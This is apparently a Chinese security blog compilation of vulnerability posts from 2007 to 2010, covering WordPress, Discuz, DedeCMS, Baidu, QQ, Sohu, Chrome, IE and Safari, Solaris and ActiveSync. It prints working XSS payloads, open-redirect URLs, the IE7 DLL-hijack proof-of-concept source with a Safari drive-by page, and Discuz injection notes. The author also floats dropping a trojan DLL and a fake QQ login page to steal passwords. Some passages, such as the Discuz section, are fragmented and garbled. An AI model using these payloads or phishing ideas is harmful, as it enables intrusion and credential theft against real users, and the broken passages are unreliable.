WordPress漏洞，影响版本为2.9.2及以下版本

Published:2010-03-17，WordPress2.9.2跨站漏洞描述：
北洋贱队(http://bbs.seceye.org)2010-03-17首发
wordpress2.9.2在使用管理员模式发表新文章或者回复的地方，插入跨站语句可导致触发跨站脚本攻击。
1.发表新文章在标题处插入如： <iframe src=http://http://clin003.com>即可导致跨站。
另WP2.9.2版本存在爆路径的bug，忘各位使用wp的朋友注意安全。

Published:2010-03-22，WordPress <= 2.9.2绕过口令保护漏洞描述：
每个页面可以设置口令，这些口令可以相同，但通过口令访问的功能设置了全站点都通用的全局Cookie，因此用户只要获得了一个对页面或帖子所设置的口令，就可以看到所有受保护的页面或帖子（在请求时会自动许可访问）。

Discuz! 所有版本永久型跨站漏洞

Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测，在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码，Discuz! 会保存并执行该代码，形成永久型跨站。

测试代码：</textarea><script>alert(/Liscker/);</script><textarea>

临时解决办法：禁止用户使用个人签名。

dedecms织梦 v5.5 两处跨站漏洞

北洋贱队2010-02-06首发

演示1(代码里的回车自行去掉):http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://clin003.com%3E&
searchtype=titlekeyword&channeltype=0&orderby=&
kwtype=1&pagesize=10&typeid=0&TotalResult=%3C
iframe%20src=http://clin003.com%3E&PageNo=2

演示2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=%3Ciframe%20src=http://clin003.com%3E&
nativeplace=0&infotype=0&keyword=&orderby=hot&
PageNo=2

解决办法：官方已有相关补丁文件 http://bbs.dedecms.com/222197.html (貌似并未完整修复)

Related posts:

• WordPress Photo album Remote SQL Injection Vulnerability
• WordPress < 2.8.1 Security Bypass 0day
• 升级WordPress2.6.2
• 今日杂碎：更新WordPress 2.6.5
• Safari for windows默认配置+ie浏览器——>木马作者的天堂

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Wordpress < 2.8.1 All Version suffer from admin module configuration security bypass exploit , attackers use these urls to attack the blog.

http://xxx.com/wp-admin/admin.php?page=/collapsing-archives/options.txt

http://xxx.com/wp-admin/admin.php?page=akismet/readme.txt

http://xxx.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php

http://xxx.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php

It is harmful.Please update your blog as soon as you can.

// sebug.net [2009-07-22]

Related posts:

• 紧急更新至WordPress 2.6.3
• 升级到 WordPress 2.8.6
• 今日杂碎：更新WordPress 2.6.5
• 多用户的WordPress博客群搭建（WordPress Mu）
• 学习 WordPress安全白皮书

影响版本：
Google Chrome Browser 0.2.149.27
谷歌浏览器 0.2.149.27

测试环境：
windows xp sp3
windows 2003 sp1

问题：

An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a ‘special’ character, the chrome crashes with a Google Chrome message window “Whoa! Google Chrome has crashed. Restart now?”. It crashes on “int 3″ at 0x01002FF3 as an exception/trap, followed by “POP EBP” instruction when pointed out by the EIP register at 0x01002FF4.

描述地址：http://evilfingers.com/advisory/google_chrome_poc.php

演示代码：

<html>
<head></head>
<body>
demo <a href=”hello:%”>HERE</a>

<iframe src=”Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar” frameborder=0 width=0 height=0></iframe>
</body>
</html>

关于Google chrome基于WebKit 525.13 (Safari 3.1)导致的Google Chrome vulnerable to carpet-bombing flaw 漏洞演示代码（一并看上边的演示代码），默认设置Google chrome是不提示自动下载回来的，只需要“中级用户选项”修改勾上“下载前询问每个文件的保存位置”，就可以躲过这个漏洞的侵害（PS：这样你就会收到提示保存位置，你就知道有个文件要下载来的，不然你不知不觉Google chrome就帮你下载啦）。

更多提示“哎呀!谷歌浏览器崩溃了，现在重新启动？”

Comments

• September 3, 2008, 谷歌浏览器Chrome首日安全漏洞 | 我的爬行JI writes: [...] 第一个未定义操作导致谷歌浏览器崩溃，囧，特意构造的链接地址可以对谷歌浏览器进行拒绝服务攻击，后果很严重 ： An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a ’special’ character, the chrome crashes with a Google Chrome message window “Whoa! Google Chrome has crashed. Restart now?”. [...]
• September 11, 2008, Google悄然升级Chrome 修复安全漏洞 | 我的爬行JI writes: [...] 经测试，在首日以及接着发现的三个漏洞均已得到修复，据悉，Google上周五以0.2.149.29新版本取代0.2.149.27，最初只是提供给部分用户，但Google并没有透露此次更新细节。 [...]

Related posts:

• 推荐几个有趣的Chrome 扩展程序(SEO工具插件)
• 体验谷歌浏览器(Google Chrome)
• 刚刚Deactivate啦DropCap First Character 1.0.1
• 当line-height小于18px时Chrome及webkit核心浏览器渲染问题
• 使用Google 加密搜索功能（Firefox插件、Chrome扩展）

关于这个混合Safari和IE漏洞攻击的分析

这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述”Internet Explorer 7 – Still Spyware Writers Heaven“，和”IE7 DLL-load hijacking Code Execution Exploit PoC” 漏洞演示代码可以在”milw0rm”找到。

这个漏洞主要出在：ie（Windows Internet Explorer）优先从“用户桌面”加载动态链接库文件（dll），而不是从程序目录（一般是：C:\WINDOWS\SYSTEM32）。

windows版的safari浏览器在没有得到确认的情况下自动下载文件到用户桌面是这次引发windows用户遭受攻击的前因。当动态链接库文件（DLL文件）为特定的名称时打开ie将从这里（用户桌面）加载这些动态链接库文件。两件事情混合起来就是：IE加载运行safari自动下载到用户桌面的动态链接库文件，最终导致用户遭受恶意攻击。

作为演示下边为LIUDIEYU写的演示代码（ie加载后调用记事本打开一个不存在的文件）

另外Aviv Raff也写过个演示代码可以在”milw0rm”找到。

（PS：其实你可以写个木马后门dll扔出去让他运行！！）

/*
        Copyright (C) 2006-2007 Aviv Raff

http://aviv.raffon.net

        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/

#include <windows.h>

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(π,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&si,π);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

// milw0rm.com [2006-12-14]

———-dll.c———-
#include <windows.h>

BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(π,sizeof(pi));

CreateProcess(NULL,”NOTEPAD \”=====(((((we are in)))))=====\”",NULL,NULL,FALSE,0,NULL,NULL,&si,π);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}

你可以编译这个库文件并命名为”schannel.dll”，“sqmapi.dll”或“imageres.dll”就可以利用啦。

———-index.html———-
<html><head>
<title>Test safari downloads automatically</title>
</head><body>
只要使用Safari打开这个页面，同时schannel.dll将自动下载到用户桌面<br>
<iframe src=”schannel.dll” width=1 height=1></iframe><br>

打开ie，将会看到效果（ie远程调用记事本打开一个不存在的文件）

<i>这就是结果.</i><br>
<br>
这个测试只能使用一次<br>
</body></html>

PS:个人认为这个组合漏洞攻击应该算是小概率事件，比如使用safari的用户很少情况会切换到ie，还有如果恶意攻击者，把文件显眼的下到用户桌面（对于这么明显的可疑文件很容易被删除的，如果隐藏怎么办呢？！）。不论怎样这是个潜在的危险（如果下次不是Safari呢？）。

PS2：这是不是也提醒程序员同学们写代码时要考虑自己的库文件搜索路径问题了，当前目录最多的情况应该是桌面啦，当然这涉及到windows内核（..）的问题（加载动态链接库的时候搜索路径的顺序——当前目录，程序目录，系统目录，谁先谁后？）

相关地址：

http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html

http://www.microsoft.com/technet/security/advisory/953818.mspx

http://liudieyu0.blog124.fc2.com/blog-entry-1.html

http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html

http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx

http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx

http://aviv.raffon.net/2006/11/01/InternetExplorer7StillSpywareWritersHeaven.aspx

http://milw0rm.org/exploits/2929

演示地址：http://liudieyu.com/iesafari200806.2885391780966027/

Related posts:

• Yahoo！Sorry, Unable to process request at this time — error 999.
• 又一下载YouTube视频利器FLVPlay
• 反病毒理念、历史、现状与未来
• Rootkit相关链接
• Internet Explorer问题集

（ps:目前还没搞清是百度联盟的认证广告还是什么广告，总之不是百度的主题推广广告，偶看到的这个广告是图片形式的）

原始广告地址：http://spcode.baidu.com/spcode/spClick?tn=ugmbbc_sp&ctn=0&styleid=1470&tourl=http://wopti.e78.com/channel.php?c=ugmbbc_spBAIDU_ANDu=1010

修改后可以被利用的地址：http://spcode.baidu.com/spcode/spClick?tourl=http://clin003.com/

这个地址可以根据原始地址改造，我挑选啦不出错的地址（主要看你的地址对这个参数的反应！）

通过搜索引擎得知是百度联盟的广告地址

百度联盟认证地址：http://spcode.baidu.com/

百度联盟地址：http://union.baidu.com/

下边是截图：

Related posts:

• 百度秘密收集用户查询历史推送相关广告（个性化服务？）
• 百度跨站漏洞：当前日期(date): 2007-11-24 星期六
• 腾讯体验中心跨站漏洞及利用想法
• 添加百度博客搜索ping服务
• 从百度导入的IP基本恢复！

http://exp.qq.com/cgi-bin/present/tec_cgi_present_plan_info%3Fplan_id%3D90

地址，很好，后边的应该就是我直接申请体验情况下，而没有让我填写体验表却跳转到登录界面的地址啦，而这个地址会在我登录完QQ后跳转进入。

想想看我直接吧后边的地址换成我的主页地址如：http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect=

http://clin003.com

这个地址是有效的，即使刷新也同样有效。

如图

如果后边我的主页地址更有欺骗性（很像QQ的？或者直接编码）些，我在制作个很像体验中心登录页面的页面？我会提示什么验证码错误之类的错误，然后是不是会有好多人重新登陆QQ号啊，然后他并没有发现这个已经不是开始的哪个页面啦，如果把这个QQ号带密码发回后让他转向到体验中心去填问卷不至于人家产生怀疑

Comments

• March 8, 2008, wiki writes: it is gone

Related posts:

• 百度跨站漏洞：当前日期(date): 2007-11-24 星期六
• 百度搜索联盟广告跨站漏洞
• Yahoo！Sorry, Unable to process request at this time — error 999.
• 主页出现问题，貌似虚拟主机服务商限制session
• 网站建立前应该做的思路规划

以下为查到的包含漏洞的页面（仅仅通过搜索引擎的索引结果）

这些链接在sohu都是在flash文件广告中的，所以baidu是搜不出来的，因为google的蜘蛛已经可以读flash文件中的部分文本啦，使用这个关键字搜索google就可以：site:sohu.com [doc.go.sohu.com*url=]

显然在club中出现的是已经利用的链接，下面的flash和专题新闻中的才是sohu真正使用的链接形式。

百度中找 doc.go.sohu.com url你将发现已经有很多利用的“恶意链接”啦，百度一下，找到相关网页约905篇，用时0.001秒

google中找[doc.go.sohu.com*url=]，约有1,390项符合[doc.go.sohu.com*url=]的查询结果，以下是第1-10项 ，不过google中部分标有“该网站可能含有恶意软件，有可能会危害您的电脑。”。

漏洞的成因很可能就是设计广告跳转记录代码的工作人员为啦以后方便使用就这样写啦个“通用代码”而没想到被发现会造成多少信任搜狐的网民受伤！！

以下是通过搜索引擎得到的部分可以利用的链接（请学习为目的，不要拿去害人）

http://doc.go.sohu.com/200801/5cb05572fda7c20a914842413d61ae7d.php?url=

http://doc.go.sohu.com/200712/d82c5aba39716d4eb8152d976a2da482.php?url=

http://doc.go.sohu.com/200712/e49df42d95615e85312aa0d030a2e552.php?url=

http://doc.go.sohu.com/200710/91e2420557be06fc6b4db18e6c7e43b8.php?url=

http://doc.go.sohu.com/200709/fd89d3a23c26c83163939a489fac349b.php?url=

http://doc.go.sohu.com/200708/adf56d76ba663e3db61b83e84384a141.php?url=

http://doc.go.sohu.com/200707/9b5c09c5c3cb8d856393a150683a5d92.php?

url=

http://doc.go.sohu.com/200706/fa9cda8c2a8455dc7e69465a16d48565.php?url=

http://doc.go.sohu.com/200706/1a22b9706f5ee9794ee29582de28d8a7.php?url=

http://doc.go.sohu.com/200705/df7fe00bc4bdb3ab1891dd6be56aa73a.php?url=

http://doc.go.sohu.com/200704/92d82b0a5606d9025e44b161597c0180.php?url=

http://doc.go.sohu.com/200704/cb19f7e8aa1d533134eea9c1197c423b.php?url=

http://doc.go.sohu.com/200703/e463ac8934207e079c5500ebddf964e1.php?url=

http://doc.go.sohu.com/200702/4788bbdf19b48e08a119cea260a63aaf.php?url=

Comments

• February 19, 2008, wiki writes: http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452.shtml 搜狐营销广告服务跨站漏洞[doc.go.sohu.com*url=]就是看到别人给你发doc.go.sohu.com样的网址都不要点

Related posts:

• 今日杂碎：调整广告形式，让广告看起来不像广告
• 2008北京奥运会开幕式ing 晚上8点
• 今日杂碎：Google市值已超通用电气,年营收不到后者1/8
• 有意思的比喻：看Google新版索引系统“咖啡因”
• 今日杂碎：4月1日全球上百家大型网站将面临DDOS主流攻击

Comments

• February 18, 2008, wiki writes: This plugin is designed to easily manage and display yourphoto albums within yourWordPress site.Plugin Admin FeaturesYou can find the plugin admin section under Manage then submenu Photos.Manage and create albumsMove photos to and from albumsUpload and delete photos

Related posts:

• 偶然间发现页面也有PR啦！
• 使用Discuz插件的同学需要注意了
• 紧急更新至WordPress 2.6.3
• 今日杂碎：谷歌出的两个很酷的DZ论坛图片插件
• 谷歌看图升级啦

Related posts:

• Firefox 3 RC1提供更新
• 秀一下我用的几个Firefox插件
• firefox 3 beta 5发布
• 相对ie谷歌更喜欢firefox？
• Windows下配置Apache虚拟主机(VirtualHost)

看图：

feedsky绑定的结果：

可喜的是并没有对其他用户造成什么影响，呵呵:)

我现在还改回来，以免以后还要去改！！，也欢迎来订阅我的Rss

Comments

• February 21, 2008, Src writes: 其实这个不算bug了，呵呵
• February 22, 2008, wiki writes: Src:发现后就通知官方客服啦!现在确实修复好啦

Related posts:

• 验证FeedSky
• ★经典★恶搞他人大全■搞跨·#愚人节■
• 搜索引擎的ping服务地址
• small enough and smart enough linux(Damn Small Linux v4.2.3 Final )
• 百度的新年愿景

这个（cknum.xunlei.com）是pplive的一个广告服务器(频道)。

还不清楚pplive和迅雷是不是只是广告上的合作。

pplive的广告服务器地址有：

cknum.xunlei.com

cop.my.xunlei.com
biz5.sandai.net
pt.cga.com.cn
pp.pplive.com

Related posts:

• Firefox代理使用办法
• 某局对谷歌音乐下手啦？
• 今日杂碎：邮件
• 原来是迅雷惹的祸
• 今日杂碎：域名纠错——>域名劫持

Related posts:

• Testing phone post
• 看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马
• Gmail要求手机验证怎么办 (国家列表中没有China)
• 手机嗅探扫描，窃…
• Fedora 11 下硬盘安装(升级)到 Fedora 12

脆弱的随机数（随机数漏洞）只有在程序使用普通的方式产生随机数出现，主要有以下两种情况产生：
1，本来就不是随机数
2，这个产生的随机数是可以预测的，或可以通过某种途径预测到的

如果创造良好的随机数，电脑必须有达到两个条件：
1，一个良好的随机数生成算法
2，随机数生成算法有一个随机的和不可预测随机数种子

脆弱性随机数的例子

代码片断：

srand (time (0));
x=rand();

这个代码产生脆弱的随机号码，它使用的值为1作为默认种子。
其他任何人在相同的机器上用同样编译这段代码，将得到同样的随机数

随机数漏洞：
随机数生成器本地栈溢出

受影响系统：
Linux kernel < 2.6.22

不受影响系统：
Linux kernel 2.6.22

描述：
Linux Kernel是开放源码操作系统Linux所使用的内核。

Linux kernel的随机数生成器（RNG）实现中存在栈溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。

如果本地root用户将默认的wakeup阀值设置为比输出池大小还要大的值的话，池传输函数就可能用RNG字节写入栈，触发栈溢出，导致拒绝服务或权限提升。

厂商补丁：
Linux
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.22.3.tar.bz2

参考以下英文片段
——————————

What is a random number vulnerability?

Computers are deterministic and are therefore predictable. Computers cannot, in and of themselves, generate truly random numbers.

In the absense of outside input, computers can only create pseudo-random numbers.

A random number vulnerability occurs when a program uses a method of generating random numbers which is either:

1. Not random
2. Predictable

To generate good random numbers, the computer must have two things:

1. A good random number generation algorithm
2. A random and unpredicatable seed for the random number generation algorithm

Random Number Vulnerability Examples

Consider the following code snippet:

x=rand();

This code generated bad random numbers because when you call rand() before a seed has been established with srand(), it uses the value 1 as a default seed. Anyone else on the same machine with the same compiler who calls rand() with a seed of 1 will get the same random number as you just did.

Let’s look at another code snippet:

srand (time (0));
x=rand();

This code does call srand() with the current time as a seed. However, this code is still insecure because:

1. The system time is a very bad seed, because it is predictable within a small range.
2. The ANSI C rand() function itself does not generate good random numbers.

Let’s examine a third code snippet:

srandom (time (0));
x=random();

This code uses the BSD random() and srandom() functions, which generate much better random numbers than their ANSI C predecessors. However, this code still uses time() to generate the seed number. A much better source for random numbers on BSD and Linux systems is the /dev/random device.

Number Seeds and Random Number Vulnerabilities

Good seed numbers come from unpredictable events such as user keystrokes or mouse movements. These are not perfect sources of randomness, however. Human behavior is somewhat predictable and computer hardware can buffer keyboard and mouse interrupts, reducing their randomness.

Numerous other random number generators are available for various platforms and development environments. It is extremely difficult to create a good one, and even more difficult to determine if the random number generator you created really is generating random and unpredictable numbers. The best path for most applications is to implement an existing random number generator which has been subject to public cryptanalysis.

Random number vulnerabilities are of interest to hackers when they can be utilized to determine input values to cryptographic functions. This can be utilized in cryptanalysis.

Improper use of the function calls rand() and random() are the normal causes of random number vulnerabilities.

Additional Information Sources on Generating Random Numbers

For more information on generating random numbers, read RFC 1750 – Randomness Recommendations for Security.

百科地址：http://wiki.mygogou.com/doc-view-771.html

Related posts:

• Pligg安装啦啦rss导入模块（Rss Importer插件的使用）
• 使用Discuz插件的同学需要注意了
• 搜索华尔兹,人肉搜索的又一利器？
• 很荣幸！竟然有人来检测这个Blog啦
• 紧急更新至WordPress 2.6.3

———————————————————————————————————————

http://www.discuz.net/admin/logging.php?action=login

可以跳到其它目录
注册登录后利用

http://www.discuz.net/search.php?user%id=100

可以进行injection……

只能手工注射

注意:showpath里必须包含用户自己的路径
如果限制的话，还可以向上跳,向上级传文件的时候，不能直接
http://www. http://www.discuz.net/user/up/_id=../../……/(注射语句)
就包含用户路径

http://www.discuz.net/member.php?action=list_UserNumber=1402257EE8F

不然不能进行注射。

文件漏洞代码如下

';print_r($Data);

*/

?>

可以直接注射,拿到后台密码。

Related posts:

• 紧急对比更新Discuz论坛安全补丁包[20081117]
• 使用Discuz插件的同学需要注意了
• Discuz! X1: “内部错误，无法显示此内容” 的纠结问题【附参考解决办法】
• 完美解决Discuz官方国庆模板页头广告错位方法
• Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)

直接复制下面的地址到IE浏览器中去看效果吧：(实验时自行去掉中间的空格)
http://www.baidu.com/index.php?tn=”>http://www.baidu.com/index.php?tn=”>< script>alert(/wiki.mygogou.com/)< /script>

把这段代码中间的网址修改成我们的首页地址：
http://www.baidu.com/index.php?tn=”>http://wiki.mygogou.com=”>< script>alert(/wiki.mygogou.com/)< /script>

wiki地址：http://wiki.mygogou.com/doc-view-744.html 

Related posts:

• 腾讯体验中心跨站漏洞及利用想法
• 百度搜索联盟广告跨站漏洞
• 百度准备自杀啦？
• 去除Office onenote 2007的激活验证和试用版标记
• 百度的新年愿景

今日，超级巡警团队监测到多个FlashGet拒绝服务漏洞被曝光，该漏洞发生在FlashGet的一个activex控件上，当安装了FlashGet的用户在浏览黑客精心构造的包含恶意代码的网页后，会导致用户浏览器崩溃。利用此漏洞的代码已在互联网上现身。

影响版本：FlashGet 1.9.6.1073

构造的漏洞利用网页截图：

触发此漏洞后的截图

二、解决方案
1、在网际快车官方发布补丁之前请暂时卸载网际快车，或者使用临时解决方案，将下面内容保存为.reg文件，双击导入注册表：
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}]
“Compatibility Flags”=dword:00000400
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
2、推荐安装超级巡警监测查杀木马。
3、请广大用户及时使用超级巡警的补丁检查功能，检查并安装系统补丁，预防更多的漏洞攻击。

注：此漏洞已通知网际快车官方，请关注官方升级解决方案。

关于网际快车（引自官方）：全球最多人使用的下载工具。

Related posts:

• WordPress < 2.8.1 Security Bypass 0day
• 允许浏览目录(目录列表)访问，让爬虫更轻松的索引网站文件
• Discuz 6.0.0 0Day漏洞
• 一些专业网址
• Rootkit相关链接

受影响系统：
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 10_x86
Sun Solaris 10.0

描述：

BUGTRAQ  ID: 26071

Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。

如果用户调用了automountd(1M)服务去访问导出了大量文件系统的远程NFS服务器的话，Solaris RPC服务库（librpcsvc(3LIB)）中的安全漏洞可能允许本地非特权用户在系统上导致automountd(1M)守护程序崩溃。如果这个漏洞被利用，则用户可能看到访问autofs(4)加载点的进程变得没有响应并挂起。在Solaris 8、Solaris 9和Solaris 10系统上，控制台会打印且syslogd(1M)守护程序会记录类似于以下的消息：

Sep  7 08:50:20 client1 autofs: automountd not running, retrying

在Solaris 10系统上，控制台还会打印且syslogd(1M)守护程序也会记录类似于以下的消息：

Sep 12 02:04:12 client1 svc.startd[7]: system/filesystem/autofs:default
failed repeatedly: transitioned to maintenance (see ‘svcs -xv’ for details)

automountd(1M)服务会崩溃，栈追踪类似于以下：

ff2a31ac xdr_reference (b1bd4, 144ea8, c, ff384898, 81010100, ff00) + 84
ff299418 xdr_pointer (b1bd4, 144ea8, c, ff384898, 0, 0) + 5c
ff384880 xdr_exports (b1bd4, 144ea8, 0, 0, 0, 1235b7) + 20
ff3848e0 xdr_exportnode (b1bd4, 144ea0, ffffffff, 0, 0, 0) + 48

这个漏洞还允许远程非特权用户在导出大量文件系统的NFS服务器上导致mountd(1M)服务崩溃，导致无法访问NFS客户端上的NFS共享。如果第二个漏洞被利用导致mountd(1M)拒绝服务的话，会观察到mountd(1M)服务可能会崩溃，栈追踪如下：

ff2a31ac xdr_reference (b1bd4, 144ea8, c, ff384898, 81010100, ff00) + 84
ff299418 xdr_pointer (b1bd4, 144ea8, c, ff384898, 0, 0) + 5c
ff384880 xdr_exports (b1bd4, 144ea8, 0, 0, 0, 1235b7) + 20
ff3848e0 xdr_exportnode (b1bd4, 144ea0, ffffffff, 0, 0, 0) + 48

或者：

ff2a2b34 xdr_reference (ac92c, 13126c, 8, ff38481c, 81010100, ff00) + 84
ff298dcc xdr_pointer (ac92c, 13126c, 8, ff38481c, 0, 0) + 5c
ff384804 xdr_groups (ac92c, 13126c, 0, 0, 6d, 9632c) + 20
ff384848 xdr_groupnode (ac92c, 131268, ffffffff, 0, 0, 0) + 2c

建议：

临时解决方法：

automountd(1M)漏洞：

在可以应用补丁之前，可通过删除或标注出/etc/auto_master文件中的-hosts项并重启automountd(1M)服务来临时解决automountd(1M)崩溃漏洞。

在Solaris 8和Solaris 9系统上以root用户运行以下命令重启automountd(1M)服务：

# /etc/init.d/autofs start

在Solaris 10系统上以root用户运行以下命令重启automountd(1M)服务：

# svcadm restart svc:/system/filesystem/autofs

如果svc:/system/filesystem/autofs处在维护状态的话，使用以下命令：

# svcadm clear svc:/system/filesystem/autofs
# svcadm enable svc:/system/filesystem/autofs

更改之后，必须使用automount(1M)工具卸载/net目录中的所有加载点。如果automount(1M)工具无法卸载/net目录中的任意加载点的话，则修改/etc/auto_master文件后必须重启系统。

mountd(1M)漏洞：

如果要临时解决非特权用户在远程NFS服务器上导致mountd(1M)服务崩溃的漏洞，可减少远程NFS服务器上共享文件系统的数目并重启该NFS服务器上的NFS服务。

如果要减少共享文件系统的数目，查看/etc/dfs/sharetab检查导出的文件系统并删除或标注/etc/dfs/dfstab中的项。

在Solaris 8和Solaris 9系统上以root用户运行以下命令重启NFS服务：

# /etc/init.d/nfs.server stop
# /etc/init.d/nfs.server start

在Solaris 10系统上以root用户运行以下命令重启NFS服务：

# svcadm restart svc:/network/nfs/server:default

厂商补丁：

Sun已经为此发布了一个安全公告（Sun-Alert-103082）以及相应补丁:
Sun-Alert-103082： Security Vulnerability in the Solaris RPC Services Library (librpcsvc(3LIB)) may Lead to a Denial of Service (DoS) Against Networked File Systems
链接：http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-103082-1

Related posts:

• 紧急更新至WordPress 2.6.3
• 使用Discuz插件的同学需要注意了
• 看到技术文章很稀奇——微软安全服务提供专家方兴：Web2.O安全研究
• 升级到 WordPress 2.8.6
• 什么是随机数漏洞,什么是脆弱的随机数

描述：

BUGTRAQ ID: 25976
CVE(CAN) ID: CVE-2007-5460

Microsoft ActiveSync是用于同步计算机与PDA的应用程序。

ActiveSync设备建立连接口令交换的过程实现上存在漏洞，攻击者可能利用此漏洞获取口令信息。

插 入到USB口时设备会使用类似于标准网络接口的连接，获得IP地址后设备会通过RAPI在990/TCP端口初始化与主机的通讯，这个过程也会经历一个小 型的握手例程，如果合适的话，会对主机挑战设备PIN或口令。用户提供了主机的PIN/口令后，会通过XOR与E9固定密钥进行混淆，然后通过USB网络 连接发送给设备进行验证。

这个过程会产生两个漏洞。首先，如果攻击者能够嗅探主机的网络连接的话，就可以恢复PIN/口令；其次，攻击者可以欺骗USB设备的插入过程诱骗用户提供PIN/口令。

以下面的报文为例：

0000 82 00 60 0f e8 00 80 00 60 0f e8 00 08 00 45 00 ..`….. `…..E.
0010 00 32 59 95 40 00 80 06 49 31 a9 fe 02 02 a9 fe .2Y.@… I1……
0020 02 01 03 de 05 d0 e8 c0 cb c0 56 2e 41 75 50 18 …….. ..V.AuP.
0030 fa 6a 91 dd 00 00 08 00 d8 e9 db e9 da e9 dd e9 .j…… ……..

36字节处为口令长度（8个字节），之后为空，然后为与E9混淆的口令。由于对口令使用了UNICODE字符串，因此每第二个字节都为0×00 XOR 0xE9等于0xE9。

厂商补丁：

Microsoft

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.microsoft.com/technet/security/